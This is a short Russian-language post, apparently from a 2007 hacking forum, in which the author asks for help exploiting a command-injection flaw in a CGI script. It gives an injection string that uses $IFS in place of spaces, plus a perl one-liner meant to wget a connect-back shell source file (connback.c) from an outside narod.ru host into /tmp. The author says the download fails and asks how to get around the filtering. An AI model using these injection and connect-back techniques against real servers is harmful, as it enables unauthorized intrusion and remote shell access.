
06.09.2007, 00:13
|
|
Постоянный
Регистрация: 15.04.2007
Сообщений: 645
Провел на форуме: 967842
Репутация:
251
|
|
cgi!!!
Есть уязв. вида bugs.cgi?path=|ls$IFS-la|, т.е. пробел надо заменять на $IFS , но на этом не вся беда, беда в том,что вроде и прав для залива хватает, но wget не пашет , curl тоже, думаю дело в $IFS, пробывал обойти это при помощи
Код:
`perl$IFS-e$IFS"print$IFS.ch(39).wget$IFSxxx.narod.ru.chr(39).chr(47).connback.c$IFS.chr(45).O'.chr(47).'tmp'.chr(47).'connback.c.chr(39)"|`
Думаю поонятно, что пытался замутить конбек, но фиг с маслом.
Может есть решение в данной проблеме!?
|
|
|